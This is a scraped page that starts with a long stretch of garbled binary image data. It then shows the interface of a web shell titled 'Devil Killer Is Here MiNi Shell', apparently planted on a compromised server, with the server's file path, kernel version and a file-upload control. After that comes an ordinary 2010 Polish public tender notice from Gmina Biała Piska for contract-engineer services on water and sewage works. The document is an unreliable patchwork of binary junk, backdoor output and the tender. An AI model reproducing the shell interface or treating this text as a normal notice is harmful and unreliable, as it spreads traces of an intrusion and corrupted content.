JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100629/187890-N-2010.html

<p class="kh_header"><b>Biała Piska: Inżynier Kontraktu dla projektu
Rozbudowa i modernizacja infrastruktury wodno-ściekowej 
w Regionie Wielkich Jezior Mazurskich - MASTERPLAN dla Wielkich Jezior Mazurskich - Gmina Biała Piska</b><br>
<b>Numer ogłoszenia: 187890 - 2010; data zamieszczenia: 29.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biała Piska , Plac Adama Mickiewicza 25, 12-230 Biała Piska, woj. warmińsko-mazurskie, tel. 0-87 4241350, 4241363, faks 0-87 4241351.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.bialapiska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Inżynier Kontraktu dla projektu
Rozbudowa i modernizacja infrastruktury wodno-ściekowej 
w Regionie Wielkich Jezior Mazurskich - MASTERPLAN dla Wielkich Jezior Mazurskich - Gmina Biała Piska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem niniejszego zamówienia są usługi Inżyniera Kontraktu związane z: administrowaniem kontraktem - zarządzaniem przedsięwzięciem, nadzorem technicznym i prawnym na budowie, kontrolą i weryfikacją dokumentów wystawianych przez Wykonawców projektu - Rozbudowa i modernizacja infrastruktury wodno-ściekowej  w Regionie Wielkich Jezior Mazurskich - MASTERPLAN dla Wielkich Jezior Mazurskich Gmina Biała Piska.

3.2. W/w projekt obejmuje realizację w latach 2010 - 2012 następujących zadań inwestycyjnych: 
1) Modernizacja oczyszczalni ścieków w Białej Piskiej.
2) Modernizacja stacji uzdatniania wody w Białej Piskiej.
3) Budowa kanalizacji sanitarnej Bemowo Piskie - Drygały.
4) Budowa kanalizacji sanitarnej Kumielsk - Szkody - Radysy. 
5) Budowa kanalizacji sanitarnej Sulimy. 
6) Budowa kanalizacji sanitarnej Nowe Drygały. 
7) Budowa kanalizacji sanitarnej Komorowo.
z następującym zakresem rzeczowym:
- długość sieci kanalizacji sanitarnej - 21 697 m
- długość przyłączy - 2 232 m
- liczba przyłączy - 174 szt.
- liczba przepompowni ścieków  -17 szt.
Dokumentacja techniczna dla przedmiotowych zadań oraz umowa o dofinansowanie w/w projektu pozostają do wglądu w siedzibie Zamawiającego, w godzinach pracy Urzędu Miejskiego: poniedziałek-piątek od 7 do 15.

3.3. Szczegółowy opis przedmiotu zamówienia:
Obowiązki Inżyniera Kontraktu (zwanego w dalszej części SIWZ Wykonawcą).
W imieniu i na rzecz Zamawiającego przejmuje obowiązki:
- przygotowania, 
- zorganizowania,
- koordynowania,
- kontrolowania procesu inwestycyjnego - wykonywanie obowiązków inspektorów nadzoru inwestorskiego zgodnie z Ustawą z dnia 7 lipca 1994 roku prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.) oraz innymi obowiązującymi w tym zakresie aktami prawnymi poprzez reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności wykonywanych robót z projektem i pozwoleniem na budowę, przepisami i obowiązującymi Polskimi Normami oraz zasadami wiedzy technicznej,
- rozliczenia finansowego projektu z uwzględnieniem kwalifikowalności kosztów zgodnie z wymaganiami dla projektów współfinansowanych z EFRR w ramach RPO,
- monitorowania, raportowania i sprawozdawczości w zakresie rzeczowym i finansowym,
- obsługi okresu gwarancyjnego.

Inżynier Kontraktu (Wykonawca)  w ramach swoich obowiązków przy realizacji projektu zobowiązany jest do:

3.3.1. Bezwzględnego przestrzegania warunków umowy o dofinansowanie projektu oraz wnikających z niej terminów i obowiązków.

3.3.2. Przeprowadzenia analizy dokumentacji technicznej projektu:
a) sprawdzenie, zgodnie z warunkami rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003 r., Nr 120, poz. 1133 z późn.zm.) dokumentacji budowlanej dostarczonej przez Zamawiającego,
b) sprawdzenie zgodności dokumentacji projektowej ze specyfikacjami technicznymi wykonania i odbioru robót oraz przedmiarami i kosztorysami inwestorskimi,
c) przygotowanie ewentualnych wniosków do projektanta w celu naniesienia uwag  w dokumentacji projektowej.

3.3.3. Przygotowanie 5 procedur przetargowych w celu wyłonienia Wykonawców zadań wymienionych w ust. 3.2 pkt 1-7:
a) sporządzenie Specyfikacji Istotnych Warunków Zamówienia wraz z załącznikami oraz ogłoszeniem o zamówieniu na w/w zadania,
b) pomoc w trakcie procesu przetargowego na roboty budowlane  - odpowiedzi na pytania oferentów,
c) uczestnictwo w roli eksperta w procesie oceny ofert na roboty budowlane,
d) przygotowanie umów z Wykonawcami robót budowlanych.

3.3.4. Współpraca z Wykonawcami robót budowlanych poszczególnych zadań projektu:
a) dostarczenie Wykonawcy robót budowlanych dokumentacji projektowej robót wraz z wymaganymi decyzjami i pozwoleniami oraz ewentualnych rozwiązań dodatkowych i zamiennych zatwierdzonych przez Zamawiającego,
b) przekazywanie terenu budowy Wykonawcom robót, w imieniu Zamawiającego i przy jego udziale, 
c) powiadamianie organu nadzoru budowlanego o terminie rozpoczęcia robót, 
z załączeniem oświadczeń kierownika budowy i inspektorów nadzoru, potwierdzającym przyjęcie obowiązków na budowie,
d) przekazywanie Wykonawcom dzienników budowy, kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego oraz wyceny robót,
e) ustalenie metod składania i wzorów wszystkich wymaganych raportów, 
raportów inspekcyjnych, protokółów odbiorów częściowych i końcowego oraz 
innych dokumentów obowiązujących w ramach realizacji projektu,
f) ustalanie harmonogramu realizacji prac budowlano-montażowych,
g) organizowanie narad koordynacyjnych zgodnie z ustalonym harmonogramem.

3.3.5. Sprawowanie nadzoru inwestorskiego nad realizacją inwestycji zgodnie 
z prawem budowlanym oraz obowiązującymi przepisami w branżach:
-	instalacji sanitarnych,
-	instalacji elektrycznych,
-	 budowlano - konstrukcyjnej,
-	 drogowej,
oraz koordynacji robót poszczególnych branż:
a) kontrola posiadanych kwalifikacji oraz uprawnień do prowadzenia prac budowlanych osób odpowiedzialnych za ich prowadzenie, świadectw i certyfikatów urządzeń 
i  materiałów, które będą wymagane kontraktem  oraz ważności ubezpieczeń  osób zatrudnionych oraz używanego sprzętu,
b) wizytowanie budowy (min.1 raz/tydzień), sprawdzanie obmiarów, nadzorowanie i odbiór robót,
c) kontrolowanie dokumentów jakości, aprobat, deklaracji zgodności, atestów, itp., 
w celu nie dopuszczenia do wbudowania materiałów wadliwych lub niedopuszczonych do stosowania w Polsce,
d) sprawdzania zgodności dostaw urządzeń z zawartymi umowami na roboty budowlane 
i sprawdzanie kompletności wymaganych atestów, aprobat i gwarancji na w/w dostarczone urządzenia,
e) sporządzania wszystkich dokumentów niezbędnych do prowadzenia nadzoru nad robotami budowlanymi i montażowymi, objętych przedmiotem kontraktu, 
f) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestnictwo w odbiorach częściowych i końcowym jak również przygotowywanie  
i udział w odbiorach gotowych obiektów i konstrukcji,
g) wydawanie kierownikowi budowy poleceń potwierdzonych wpisem do dziennika budowy dotyczących: wykonania prób, wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych oraz urządzeń 
technicznych,
h) wydawanie zgody na wykonanie robót dodatkowych, zamiennych po uprzedniej uzgodnieniu  z Zamawiającym,
i) nadzorowanie przeprowadzanych prób, badań, testów i rozruchów instalacji i urządzeń oraz sprawdzanie instrukcji obsługi (gdzie jest to konieczne) opracowanej przez Wykonawcę w celu przekazania inwestycji Zamawiającemu,
j) przyjmowanie od Wykonawców robót wszelkich dokumentów wymaganych w terminie odbioru (atesty, aprobaty techniczne, protokoły badań, protokoły pomiarów, gwarancje, DTR i instrukcje obsługi zainstalowanych urządzeń i systemów, geodezyjne inwentaryzacje powykonawcze obiektów, itp),                  
k) przygotowanie dokumentów do wniosku w celu uzyskania pozwoleń na użytkowanie.

3.3.6. Rozliczenia finansowe:
a) prowadzenie rozliczeń finansowych zgodnie z odpowiednimi Wytycznymi Ministra Rozwoju Regionalnego dla Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007 - 2013, a także obowiązującymi przepisami prawa polskiego, 
b) weryfikacja kosztów realizacji robót budowlanych objętych kontraktami zgodnie  z wnioskiem o dofinansowanie projektu, wytycznymi w sprawie kwalifikowalności wydatków, zgodnie z warunkami umowy o dofinansowanie projektu,
c) przygotowanie wszystkich dokumentów niezbędnych do realizacji projektu, w tym wniosków o płatność, płatność zaliczkową, sprawozdań rzeczowych i finansowych, dokumentacji niezbędnej do rozliczenia projektu,
d) przestrzeganie wytycznych i wymagań oraz opracowywanie wszelkich dokumentów 
i rozliczeń z dofinansowania (w tym sporządzanie odpowiednich okresowych 
i ostatecznych sprawozdań wraz ze wszystkimi niezbędnymi załącznikami), 
e) całkowite końcowe rozliczenie rzeczowe i finansowe projektu zgodnie z umową o dofinansowaniu i ustalonymi zasadami rozliczania inwestycji,
f) przygotowanie dokumentów niezbędnych do audytu.

3.3.7. Współpraca z Zamawiającym:
a) składanie Zamawiającemu raportów na temat postępu robót budowlanych objętych przedmiotem kontraktu, umożliwiających wczesną analizę ewentualnych zagrożeń oraz przedkładanie zaleceń i propozycji rozwiązań w tym zakresie w formie sprawozdań miesięcznych i kwartalnych do oceny Zamawiającego,  
b) bieżące informowanie Zamawiającego o obowiązujących uregulowaniach prawnych, w tym o ewentualnej zmianie wytycznych w zakresie warunków i zasad realizacji kontraktu, będącego przedmiotem dofinansowania w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007 - 2013,
c) współpraca z Zamawiającym w zakresie  wszystkich niezbędnych, żądanych dokumentów, raportów, dotyczących rozliczeń, zgodnie z procedurami rozliczeniowymi RPO,
d) stałe konsultowanie i fachowe doradztwo na rzecz Zamawiającego,
e) współpraca przy promocji projektu,
f) zestawienie dla Zamawiającego danych nowopowstałych środków trwałych.
3.3.8. Obsługa okresu gwarancyjnego:
a) w ramach umowy Inżyniera Kontraktu bez dodatkowego wynagrodzenia Wykonawca zapewni obsługę w okresie gwarancji liczonego od odbioru końcowego poszczególnych robót budowlanych,
b) uczestnictwo w przeglądach gwarancyjnych w okresie gwarancji po upływie każdego roku od odbioru obiektu, 
c) uczestnictwo inspektorów nadzoru odpowiednich branż, w terminie określonym przez Zamawiającego w rozpatrzeniu zgłoszonych przez Użytkownika i Zamawiającego usterek i wad w okresie gwarancji, 
d) wyegzekwowanie od wykonawcy robót budowlanych usunięcia stwierdzonych wad 
i usterek w okresie gwarancji.

3.3.9. Kierowanie i koordynowanie realizacji projektu: 
a) systematyczny monitoring postępu w realizacji projektu zgodnie z dokumentacją techniczną, dokumentami przetargowymi na roboty budowlane oraz zatwierdzonymi harmonogramami,
b) zapewnienie terminowego i prawidłowego zakończenia robót zgodnie z harmonogramami określonymi w stosownych dokumentacjach technicznych,
c) rozwiązywanie problemów i sporów powstałych w trakcie realizacji robót,
d) przygotowanie dokumentacji do rozstrzygnięcia ewentualnych sporów w trybie sądowym,
e) stałe uczestniczenie w naradach technicznych, problemowych i innych organizowanych przez wszystkie strony procesu inwestycyjnego,
f) podejmowanie czynności mających na celu ochronę interesów Zamawiającego,
g) pełnienie funkcji koordynacyjnych na budowie.

3.3.10. Inżynier Kontraktu w ramach umówionej ceny ryczałtowej, wykona wszystkie inne obowiązki, czynności i zadania, które będą konieczne do prawidłowej realizacji kontraktów na roboty oraz zabezpieczenia interesów Zamawiającego.

3.3.11. Zaleca się, aby Inżynier Kontraktu dokonał wizji lokalnej terenu budów, a także zapoznał się z dokumentacją techniczną i projektową, pozwoleniami, decyzjami, umowami, wytycznymi itp. oraz wszelkimi dodatkowymi informacjami, które jego zdaniem mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty wizji lokalnej terenu budowy ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 76.60.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie w sposób należyty w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie : 
- zamówień na -Inżyniera Kontraktu- związanych z realizacją projektów 
branży sanitarnej (wodno - ściekowej) wraz z wykonaniem prac z zakresu branży elektrycznej -  co najmniej jeden projekt na kwotę nie mniejszą niż 5 000 000 zł. 
Przy ocenie spełnienia tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku, 
wartość wykonanych usług będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Za spełnienie tego warunku uznaje się złożenie oświadczenia określonego w pkt 6    ppkt 6.6 SIWZ oraz wykazu wykonanych usług określonego w pkt 6 ppkt 6.3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie oświadczenia określonego w pkt 6   ppkt 6.6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że będzie dysponował poniższymi osobami, którym zostanie powierzone wykonanie niniejszego zamówienia. Osoby te muszą posiadać kwalifikacje i doświadczenie zawodowe nie mniejsze niż określone poniżej:
a) Menedżer Projektu - osoba z wykształceniem wyższym, posiadającym co najmniej 5-letnie doświadczenie zawodowe i musi wykazać, że obsługiwała minimum 1 projekt w branży sanitarnej (wodno - ściekowej) współfinansowany ze środków U.E.,
b) Inspektorzy nadzoru:
- Inspektor nadzoru w branży konstrukcyjno-budowlanej - uprawnienia do kierowania robotami w tej specjalności zgodnie z wymogami Prawa budowlanego, przynależność do Izby Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w kierowaniu robotami lub pracy na stanowisku Inspektora Nadzoru w proponowanej specjalności,
- Inspektor nadzoru w branży sanitarnej - uprawnienia do kierowania robotami  w tej specjalności zgodnie z wymogami Prawa budowlanego, przynależność do Izby Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w kierowaniu robotami lub pracy na stanowisku Inspektora Nadzoru w proponowanej specjalności,
- Inspektor nadzoru w branży elektrycznej - uprawnienia do kierowania robotami w tej specjalności zgodnie z wymogami Prawa budowlanego, przynależność do Izby Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w kierowaniu robotami lub pracy na stanowisku Inspektora Nadzoru w proponowanej specjalności,
- Inspektor nadzoru w branży drogowej - uprawnienia do kierowania robotami w tej specjalności zgodnie z wymogami Prawa budowlanego, przynależność do Izby Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w kierowaniu robotami lub pracy na stanowisku Inspektora Nadzoru w proponowanej specjalności,
c) Inspektor do spraw rozliczeń - minimum 3-letnia doświadczenie przy rozliczaniu kontraktów na wykonanie robót, w tym rozliczenie co najmniej 1 projektu współfinansowanego  ze środków U.E.
Za spełnienie tego warunku uznaje się złożenie wykazu określonego w pkt 6 ppkt 6.4 SIWZ i oświadczenia określonego w pkt 6 ppkt 6.5 SIWZ (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie oświadczenia określonego w pkt 6  ppkt 6.6 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
